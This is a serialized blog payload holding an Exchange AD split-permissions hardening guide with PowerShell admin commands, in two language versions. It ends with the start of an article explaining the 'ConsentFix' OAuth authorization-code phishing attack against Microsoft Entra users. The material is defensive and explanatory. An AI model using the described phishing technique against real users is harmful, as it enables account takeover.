\"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[2016,4554],{},[1588,4556,4557,2025,4560,4564,4565,2025,4568,4570,4571,4574,4575,2025,4578,2025,4581,2025,4583,4586,4587,4590,4591],{},[1588,4558,4559],{"style":4542},"Search-AdminAuditLog",[1588,4561,4563],{"style":4562},"color:var(--color-gk-mid-blue)","-ResultSize"," 99000 ",[1588,4566,4567],{"style":4562},"-Cmdlets",[1588,4569,4551],{"style":4542}," | ",[1588,4572,4573],{"style":4542},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[1588,4576,4577],{"style":4542},"Export-Csv",[1588,4579,4580],{"style":4562},"-Path",[1588,4582,4543],{"style":4542},[1588,4584,4585],{"style":4562},"-Delimiter"," \";\" ",[1588,4588,4589],{"style":4562},"-Encoding"," Unicode ",[1588,4592,4593],{"style":4562},"-NoTypeInformation",[806,4595,4596],{},[1736,4597,4598],{},"Quick Analysis of caller and cmdlets:",[2009,4600,4601,4617,4619,4627,4629],{},[1588,4602,4603,4606,4607,2025,4610,2025,4612,2025,4614,4616],{},[1588,4604,4605],{"style":4542},"$CSVs"," = ",[1588,4608,4609],{"style":4542},"Import-Csv",[1588,4611,4580],{"style":4562},[1588,4613,4543],{"style":4542},[1588,4615,4585],{"style":4562}," \";\"",[2016,4618],{},[1588,4620,4621,4570,4623,4626],{},[1588,4622,4605],{"style":4542},[1588,4624,4625],{"style":4542},"Group-Object"," Caller",[2016,4628],{},[1588,4630,4631,4570,4633,4635],{},[1588,4632,4605],{"style":4542},[1588,4634,4625],{"style":4542}," CmdletName",[806,4637,4638],{},"Analyze the CSV for where AD permissions will be needed. 
Potentially optimize by moving all Exchange-relevant groups into dedicated OUs.",[810,4640,4642],{"id":4641},"enable-split-permissions-model","Enable Split Permissions Model",[806,4644,4645,4646,4649,4650,4654],{},"Follow Microsoft's instructions ",[1736,4647,4648],{},"\"Switch to Active Directory split permissions\""," in\n",[833,4651,4465],{"href":4652,"rel":4653},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[1410],[4655,4656,4657],"em",{},"(NOT RBAC split permissions)",[806,4659,4660,4661,4664],{},"In essence, it will remove the dangerous permissions of the ",[1736,4662,4663],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[2009,4666,4667],{},[1588,4668,4669,2025,4672,2025,4675,2025,4678],{},[1588,4670,4671],{"style":4542},"Setup.exe",[1588,4673,4674],{"style":4562},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[1588,4676,4677],{"style":4562},"/PrepareAD",[1588,4679,4680],{"style":4562},"/ActiveDirectorySplitPermissions:true",[1541,4682,1905,4684,4686,4687],{"style":4683},"background:#f4f4f4; border-left:4px solid var(--color-gk-petrol); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[1736,4685,4494],{}," To revert back, simply use ",[1524,4688,4689],{},"/ActiveDirectorySplitPermissions:false",[1671,4691,4693],{"id":4692},"grant-ad-permissions","Grant AD Permissions",[806,4695,4696],{},"Create a custom AD group and make Exchange servers members.",[2009,4698,4699,4705,4707,2025,4710,4713,4714,4717,4718,4721,4722,2025,4724,2025,4727,4730,4731,4733,4713,4736,4739,4740],{},[1588,4700,4701],{},[1588,4702,4704],{"style":4703},"color:var(--color-black-40)","# adjust OU Path first!",[2016,4706],{},[1588,4708,4709],{"style":4542},"New-ADGroup",[1588,4711,4712],{"style":4562},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[1588,4715,4716],{"style":4562},"-GroupCategory"," Security 
",[1588,4719,4720],{"style":4562},"-GroupScope"," DomainLocal ",[1588,4723,4580],{"style":4562},[1736,4725,4726],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[1588,4728,4729],{"style":4562},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[2016,4732],{},[1588,4734,4735],{"style":4542},"Add-ADGroupMember",[1588,4737,4738],{"style":4562},"-Members"," \"Exchange Trusted Subsystem\"\n",[1588,4741,4742],{"style":4703},"# reboot Exchange servers for permissions via group to work",[806,4744,4745],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[3587,4747,4748],{},[806,4749,4750,4751,4754],{},"Without these permissions the Exchange server would receive the error ",[1524,4752,4753],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[806,4756,4757,4758,4763],{},"Download ",[833,4759,4762],{"href":4760,"rel":4761},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[1410],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[806,4765,4766],{},"It can grant the following PermissionTypes:",[806,4768,4770,4773,4775,4776,4778],{"style":4769},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[1736,4771,4772],{},"CreateUserAndContact",[2016,4774],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[2016,4777],{},[4779,4780,4781],"small",{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[806,4783,4785,4788,4790,4791,4793],{"style":4784},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[1736,4786,4787],{},"GroupManage",[2016,4789],{},"Create/Delete Groups, Modify Member",[2016,4792],{},[4779,4794,4795,4796,4798],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, 
`Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[2016,4797],{},"Also: user managing DistributionGroups they own via EAC",[806,4800,4801,4804,4806,4807,4809],{"style":4784},[1736,4802,4803],{},"UserSendAs",[2016,4805],{},"Modify AD Permissions on Users",[2016,4808],{},[4779,4810,4811],{},"Exchange cmdlet: `Add-ADPermission`",[806,4813,4814,4817,4819,4820,4822],{"style":4784},[1736,4815,4816],{},"GroupSendAs",[2016,4818],{},"Modify AD Permissions on Groups",[2016,4821],{},[4779,4823,4811],{},[806,4825,4826],{},[1736,4827,4828],{},"How to use the script:",[2009,4830,4831,2025,4833,4836,4837,4840,4841,4844,4845,4848,4850,2025,4852,4854,4855,4857,4858,4844,4860,2025,4862,4854,4864,4866,4867,4844,4869,2025,4871,4873,4874,4876,4877,4844,4879,2025,4881,4873,4883,4885,4886,4844],{},[1588,4832,4762],{"style":4542},[1588,4834,4835],{"style":4562},"-TargetOU"," \u003COU> ",[1588,4838,4839],{"style":4562},"-PermissionType"," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[1588,4842,4843],{"style":4562},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[1588,4846,4847],{"style":4703},"# For example",[2016,4849],{},[1588,4851,4762],{"style":4542},[1588,4853,4835],{"style":4562}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[1588,4856,4839],{"style":4562}," GroupManage ",[1588,4859,4843],{"style":4562},[1588,4861,4762],{"style":4542},[1588,4863,4835],{"style":4562},[1588,4865,4839],{"style":4562}," GroupSendAs ",[1588,4868,4843],{"style":4562},[1588,4870,4762],{"style":4542},[1588,4872,4835],{"style":4562}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[1588,4875,4839],{"style":4562}," UserSendAs ",[1588,4878,4843],{"style":4562},[1588,4880,4762],{"style":4542},[1588,4882,4835],{"style":4562},[1588,4884,4839],{"style":4562}," CreateUserAndContact ",[1588,4887,4843],{"style":4562},[1671,4889,4891],{"id":4890},"grant-exchange-rbac","Grant Exchange 
RBAC",[806,4893,4894],{},[1736,4895,4896],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[2009,4898,4899],{},[1588,4900,4901,2025,4904,4906,4907,4910,4911,4913,4914,4916],{},[1588,4902,4903],{"style":4542},"New-RoleGroup",[1588,4905,4712],{"style":4562}," \"SplitPermission Security Group Creation and Membership\" ",[1588,4908,4909],{"style":4562},"-Roles"," \"Security Group Creation and Membership\" ",[1588,4912,4738],{"style":4562}," \"Organization Management\",\"Recipient Management\" ",[1588,4915,4729],{"style":4562}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[3587,4918,4919],{},[806,4920,4921,4923],{},[1736,4922,4494],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[806,4925,4926,4928,4931,4933],{},[2016,4927],{},[1736,4929,4930],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[2016,4932],{},[2009,4934,4935,2025,4937,4939,4940,4942,4943,4913,4945,4947],{},[1588,4936,4903],{"style":4542},[1588,4938,4712],{"style":4562}," \"SplitPermission Mail Recipient Creation\" ",[1588,4941,4909],{"style":4562}," \"Mail Recipient Creation\" ",[1588,4944,4738],{"style":4562},[1588,4946,4729],{"style":4562}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[810,4949,4951],{"id":4950},"conclusions","Conclusions",[806,4953,4954],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. 
In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[806,4956,4957],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[806,4959,4960,4961,4966,4967,4972],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[833,4962,4965],{"href":4963,"rel":4964},"https://www.pingcastle.com/",[1410],"PingCastle"," or ",[833,4968,4971],{"href":4969,"rel":4970},"https://www.semperis.com/purple-knight/",[1410],"Purple Knight"," to assess your AD security posture and identify control path exposures.",[3604,4974,4975],{},"\ncode {\n  font-size: inherit\n}\n",{"title":863,"searchDepth":864,"depth":864,"links":4977},[4978,4979,4980,4981,4984,4988],{"id":4334,"depth":864,"text":4335},{"id":4379,"depth":864,"text":4380},{"id":4478,"depth":864,"text":4479},{"id":4519,"depth":864,"text":4520,"children":4982},[4983],{"id":4529,"depth":1814,"text":4530},{"id":4641,"depth":864,"text":4642,"children":4985},[4986,4987],{"id":4692,"depth":1814,"text":4693},{"id":4890,"depth":1814,"text":4891},{"id":4950,"depth":864,"text":4951},{"lang":4,"seoTitle":4990,"titleClass":873,"date":4991,"blogtitlepic":4992,"socialimg":4993,"customExcerpt":4994,"keywords":4995,"hreflang":4996,"scripts":5003,"asideNav":5004,"maxContent":508,"published":508},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an 
underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[4997,4999,5001],{"lang":4,"href":4998},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":956,"href":5000},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":953,"href":5002},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":508,"form":508},{"menuItems":5005},[5006,5008,5010,5012,5014],{"href":5007,"text":4335},"#tldr-what-if-we-remove-the-downsides",{"href":5009,"text":4380},"#why-do-we-care-now",{"href":5011,"text":4479},"#but-why-is-no-one-doing-it",{"href":5013,"text":4520},"#show-me-this-no-regrets-option",{"href":5015,"text":4951},"#conclusions","/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":4328,"description":863},"posts/2026-03-01-exchange-ad-split-permissions-hardening","2LLcvg4ClzcZySeeO5MMZkQ0Dmst7mCMcGysY3DmXFA",{"id":5021,"title":5022,"author":5023,"body":5025,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":508,"layout":870,"meta":5484,"moment":5485,"navigation":508,"path":5502,"seo":5503,"stem":5504,"tags":764,"webcast":749,"__hash__":5505},"content_de/posts/2026-01-27-exchange-active-directory.md","​​​Exchange AD Split Permissions without regrets​",[5024],"​Thorsten 
Kunzi​",{"type":803,"value":5026,"toc":5467},[5027,5029,5032,5036,5039,5056,5058,5060,5065,5075,5079,5082,5085,5115,5128,5130,5135,5143,5146,5159,5161,5166,5168,5178,5183,5188,5206,5209,5233,5235,5255,5263,5275,5285,5339,5342,5365,5382,5394,5407,5414,5416,5425,5436,5447,5449,5452,5455,5465],[1671,5028,4335],{"id":4334},[806,5030,5031],{},"I found a way to re-grant the AD and RBAC permissions where the Exchange user, groups, contacts, etc. reside. This way there is no adoption needed for admins or identity management systems, which in my experience was the blocker for most companies to implement it. And we still get the security benefit against lateral movement and domain compromise.",[806,5033,5034],{},[1449,5035],{"alt":4343,"src":4344},[1671,5037,4349],{"id":5038},"its-achieved-in-three-steps",[4351,5040,5041,5048,5052],{},[2741,5042,4355,5043,5046],{},[833,5044,4359],{"href":4358,"rel":5045},[1410],[2016,5047],{},[2741,5049,4362,5050],{},[2016,5051],{},[2741,5053,4365,5054],{},[2016,5055],{},[806,5057,4368],{},[1671,5059,4380],{"id":4379},[806,5061,5062,5063,4388],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk to Active Directory takeover. 
Combined with Exchange being notorious for remote exploits these last few years, it’s time to act!",[2016,5064],{},[2738,5066,5067,5069,5071,5073],{},[2741,5068,4393],{},[2741,5070,4396],{},[2741,5072,4399],{},[2741,5074,4402],{},[806,5076,5077],{},[1449,5078],{"alt":4407,"src":4408},[806,5080,5081],{},"Only certain high privileged Tier0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[1671,5083,4416],{"id":5084},"prominent-examples",[2738,5086,5087,5090,5106],{},[2741,5088,5089],{},"Entra Connect Sync account when using PWHashSync",[2741,5091,5092,5093],{},"Default groups\n",[2738,5094,5095,5098,5104],{},[2741,5096,5097],{},"Allowed RODC Password Replication Group together with EntraConnect account (If a real Windows RODC exists)",[2741,5099,4433,5100,4438],{},[833,5101,4437],{"href":5102,"rel":5103},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta/",[1410],[2741,5105,4441],{},[2741,5107,5108,5109],{},"Unprotected custom groups or admin/service accounts\n",[2738,5110,5111,5113],{},[2741,5112,4449],{},[2741,5114,4452],{},[806,5116,5117,5118,4460,5120,5123,4470,5125],{},"It is very hard to retroactively contain all these current and future potential pathways. 
For the _ADM custom OU you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2016,5119],{},[833,5121,4465],{"href":4463,"rel":5122},[1410],[2016,5124],{},[833,5126,4475],{"href":4473,"rel":5127},[1410],[810,5129,4479],{"id":4478},[806,5131,5132,5133,4487],{},"As split permissions weren’t available until Exchange 2010 SP1 everyone had accepted it by then and it seems that security teams did not manage to push successfully once it existed.",[2016,5134],{},[806,5136,5137,5138,5140],{},"No longer available or working cmdlets:",[2016,5139],{},[1524,5141,5142],{},"Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission ",[1671,5144,4500],{"id":5145},"adoption-examples",[2738,5147,5148,5157],{},[2741,5149,5150,5151],{},"New-Mailbox (where Exchange writes to AD) would be:\n",[2738,5152,5153,5155],{},[2741,5154,4510],{},[2741,5156,4513],{},[2741,5158,4516],{},[810,5160,4520],{"id":4519},[806,5162,5163,5165],{},[1736,5164,4525],{},": Please fully read and understand the following links and articles, perform in a test environment first, make sure AD backups are current and recovery practices are established!",[1671,5167,4530],{"id":4529},[806,5169,5170,5173,5175],{},[1736,5171,5172],{},"You should first check which of the affected cmdlets are in use on which OUs.",[2016,5174],{},[1524,5176,5177],{},"$CsvPath =\"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[806,5179,5180],{},[1524,5181,5182],{},"$Cmdlets = 
\"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[806,5184,5185],{},[1524,5186,5187],{},"Search-AdminAuditLog -ResultSize 99000 -Cmdlets $Cmdlets| select RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($_.CmdletParameters))}},succeeded,error | Export-Csv -Path $CsvPath -Delimiter \";\" -Encoding Unicode -NoTypeInformation",[806,5189,5190,5192,5194,5197,5200,5203],{},[1736,5191,4598],{},[2016,5193],{},[1524,5195,5196],{},"$CSVs=Import-Csv -Path $CsvPath -Delimiter \";\"",[1524,5198,5199],{},"$CSVs|group Caller",[1524,5201,5202],{},"$CSVs|group CmdletName",[1524,5204,5205],{},"Analyze the CSV for where AD permissions will be needed. 
Potentially optimize by moving all Exchange relevant groups into dedicated OUs.",[1671,5207,5208],{"id":4641},"Enable split permissions model",[806,5210,5211,5218,5220,5221,5223,5226,5228,2025,5231],{},[1736,5212,5213,5214,5217],{},"Follow instructions of “Switch to Active Directory split permissions” in ",[833,5215,4465],{"href":4358,"rel":5216},[1410]," (NOT RBAC split permissions)",[2016,5219],{},"\nIn essence it will remove the dangerous permissions of “Exchange Windows Permissions” group and also remove Exchange as group member.",[2016,5222],{},[1524,5224,5225],{},"Setup.exe /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /PrepareAD /ActiveDirectorySplitPermissions:true",[2016,5227],{},[1736,5229,5230],{},"To revert back just use:",[1524,5232,4689],{},[1671,5234,4693],{"id":4692},[806,5236,5237,5240,5242,5243,5245,5248,5250,5252],{},[1736,5238,5239],{},"Create a custom AD group and make Exchange server members.",[2016,5241],{},"\nadjust OU Path first!",[2016,5244],{},[1524,5246,5247],{},"New-ADGroup -Name \"AD_Custom Exchange Split permissions replacement\" -GroupCategory Security -GroupScope DomainLocal -Path \"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\" -Description \"replaces the permissions lost by split permissions on relevant OUs\"",[2016,5249],{},[2016,5251],{},[1524,5253,5254],{},"Add-ADGroupMember \"AD_Custom Exchange Split permissions replacement\" -Members \"Exchange Trusted Subsystem\"",[806,5256,5257,5260,5262],{},[1736,5258,5259],{},"reboot Exchange servers for permissions via group to work",[2016,5261],{},"\nI’ve created a script to make delegating the AD permissions easy per use case.",[3587,5264,5265],{},[806,5266,5267,5272,5273,4754],{},[1736,5268,5269],{},[4655,5270,5271],{},"INFO:"," Without these permissions the Exchange server would receive the error ",[1524,5274,4753],{},[806,5276,5277,5282,5284],{},[1736,5278,4757,5279,4763],{},[833,5280,4762],{"href":4760,"rel":5281},[1410],[2016,5283],{},"\nIt can 
grant the following PermissionTypes:",[2738,5286,5287,5298,5316,5328],{},[2741,5288,5289,5291],{},[1736,5290,4772],{},[2738,5292,5293,5295],{},[2741,5294,4775],{},[2741,5296,5297],{},"Exchange cmdlets: New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and the matching Remove-*",[2741,5299,5300,5302],{},[1736,5301,4787],{},[2738,5303,5304,5306,5309],{},[2741,5305,4790],{},[2741,5307,5308],{},"Exchange cmdlets: New-DistributionGroup, Remove-DistributionGroup, Add-DistributionGroupMember, Update-DistributionGroupMember, Remove-DistributionGroupMember",[2741,5310,5311,5312],{},"Additional use cases: users managing DistributionGroups they own via https://",[5313,5314,5315],"on-prem-exchange",{},"/EAC",[2741,5317,5318,5320],{},[1736,5319,4803],{},[2738,5321,5322,5325],{},[2741,5323,5324],{},"Modify AD Permissions on Users",[2741,5326,5327],{},"Exchange cmdlet: Add-ADPermission",[2741,5329,5330,5332],{},[1736,5331,4816],{},[2738,5333,5334,5337],{},[2741,5335,5336],{},"Modify AD Permissions on Groups",[2741,5338,5327],{},[1671,5340,4828],{"id":5341},"how-to-use-the-script",[806,5343,5344],{},[1524,5345,5346,2025,5349,2025,5355,2025,5357,2025,5362],{},[1524,5347,5348],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU",[5350,5351,5352],"b",{},[1524,5353,5354],{},"\u003COU>",[1524,5356,4839],{},[5350,5358,5359],{},[1524,5360,5361],{},"\u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact>",[1524,5363,5364],{},"-Trustee \"AD_Custom Exchange Split permissions replacement",[806,5366,5367,5368,5370],{},"e.g.",[2016,5369],{},[1524,5371,5372,2025,5375,2025,5379],{},[1524,5373,5374],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[5350,5376,5377],{},[1524,5378,4787],{},[1524,5380,5381],{},"-Trustee \"AD_Custom Exchange Split permissions 
replacement\"",[806,5383,5384],{},[1524,5385,5386,2025,5388,2025,5392],{},[1524,5387,5374],{},[5350,5389,5390],{},[1524,5391,4816],{},[1524,5393,5381],{},[806,5395,5396],{},[1524,5397,5398,2025,5401,2025,5405],{},[1524,5399,5400],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[5350,5402,5403],{},[1524,5404,4803],{},[1524,5406,5381],{},[806,5408,5409],{},[1524,5410,5411],{},[1524,5412,5413],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType CreateUserAndContact -Trustee \"AD_Custom Exchange Split permissions replacement\"",[1671,5415,4891],{"id":4890},[806,5417,5418,5420,5422],{},[1736,5419,4896],{},[2016,5421],{},[1524,5423,5424],{},"New-RoleGroup -Name \"SplitPermission Security Group Creation and Membership\" -Roles \"Security Group Creation and Membership\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\" ",[3587,5426,5427],{},[806,5428,5429,2025,5433,5435],{},[1736,5430,5431],{},[4655,5432,5271],{},[2016,5434],{},"Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[806,5437,5438,5440,5442,5444],{},[2016,5439],{},[1736,5441,4930],{},[2016,5443],{},[1524,5445,5446],{},"New-RoleGroup -Name \"SplitPermission Mail Recipient Creation\" -Roles \"Mail Recipient Creation\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... 
cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[810,5448,4951],{"id":4950},[806,5450,5451],{},"I hope that with this guidance many more will take this important step to secure their Active Directory from compromise via Exchange. I have not yet run into issues when I implemented Exchange AD split permissions model and the adoption from this article at our customers.",[806,5453,5454],{},"I hope Microsoft will implement a native way to achieve this granular OU based approach, instead of the current all or nothing, for it to become widely adopted.",[806,5456,5457,5458,4966,5461,5464],{},"As AD Tiering is dear to my heart: Additionally, please do not logon to Exchange servers with Domain Admin (or any Tier0) accounts but treat them as Tier1 from now on and implement AD Tiering asap.\nAs a first step, I recommend tools like ",[833,5459,4965],{"href":4963,"rel":5460},[1410],[833,5462,4971],{"href":4969,"rel":5463},[1410]," to assess your AD Security and Control Paths.",[3604,5466,4975],{},{"title":863,"searchDepth":864,"depth":864,"links":5468},[5469,5470,5471,5472,5473,5476,5483],{"id":4334,"depth":1814,"text":4335},{"id":5038,"depth":1814,"text":4349},{"id":4379,"depth":1814,"text":4380},{"id":5084,"depth":1814,"text":4416},{"id":4478,"depth":864,"text":4479,"children":5474},[5475],{"id":5145,"depth":1814,"text":4500},{"id":4519,"depth":864,"text":4520,"children":5477},[5478,5479,5480,5481,5482],{"id":4529,"depth":1814,"text":4530},{"id":4641,"depth":1814,"text":5208},{"id":4692,"depth":1814,"text":4693},{"id":5341,"depth":1814,"text":4828},{"id":4890,"depth":1814,"text":4891},{"id":4950,"depth":864,"text":4951},{"lang":953,"seoTitle":4990,"titleClass":873,"date":5485,"blogtitlepic":5486,"socialimg":5487,"customExcerpt":5488,"keywords":4995,"hreflang":5489,"scripts":5494,"asideNav":5495,"maxContent":508,"published":749},"2026-01-27","head-vulnerability-management","/heads/head-vulnerability-management.jpg","On-Premises Exchange 
Server installations are still prevalent even for organizations that have moved all mailboxes to the cloud. Also, they are still very powerful within Active Directory so most times there is a strong attack path on compromising the whole AD and with that usually much of the corporate IT. Switching to the so called “AD Split permissions” removes the critical permissions and I have engineered a solution that removes it’s downsides that usually prevented the adoption.",[5490,5492],{"lang":953,"href":5491},"/en/posts/2026-01-27-exchange-active-directory",{"lang":956,"href":5493},"/es/posts/2026-01-27-exchange-active-directory",{"slick":508,"form":508},{"menuItems":5496},[5497,5498,5499,5500,5501],{"href":5007,"text":4335},{"href":5009,"text":4380},{"href":5011,"text":4479},{"href":5013,"text":4520},{"href":5015,"text":4951},"/posts/2026-01-27-exchange-active-directory",{"title":5022,"description":863},"posts/2026-01-27-exchange-active-directory","GIJKs0KoXNlN8lgokuTJTmXqlw1U_NE9Ak6MMaScqf4",{"id":5507,"title":5508,"author":5509,"body":5510,"cta":764,"description":5514,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":6293,"moment":6295,"navigation":508,"path":6321,"seo":6322,"stem":6323,"tags":6324,"webcast":749,"__hash__":6327},"content_de/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[1185,1065,1221],{"type":803,"value":5511,"toc":6273},[5512,5515,5518,5521,5527,5530,5533,5542,5547,5555,5575,5578,5584,5587,5590,5596,5601,5605,5616,5622,5625,5628,5632,5635,5641,5648,5651,5671,5681,5685,5688,5691,5694,5697,5701,5704,5707,5724,5733,5737,5741,5761,5765,5770,5781,5784,5790,5794,5808,5812,5823,5827,5830,5838,5841,5849,5852,5860,5864,5867,5888,5891,5955,5958,5961,5964,5967,5970,5976,5979,6020,6024,6039,6043,6047,6061,6064,6067,6072,6075,6086,6090,6097,6101,6107,6112,6126,6132,6138,6144,6155,6158,6164,6167,6192,6200,6204,6224,6230,6233,6239,6243],[806,5513,5514],{},"As it is tradition right before the end of the year, a new 
vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[806,5516,5517],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[806,5519,5520],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[806,5522,5523],{},[1449,5524],{"alt":5525,"src":5526},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[806,5528,5529],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[806,5531,5532],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. 
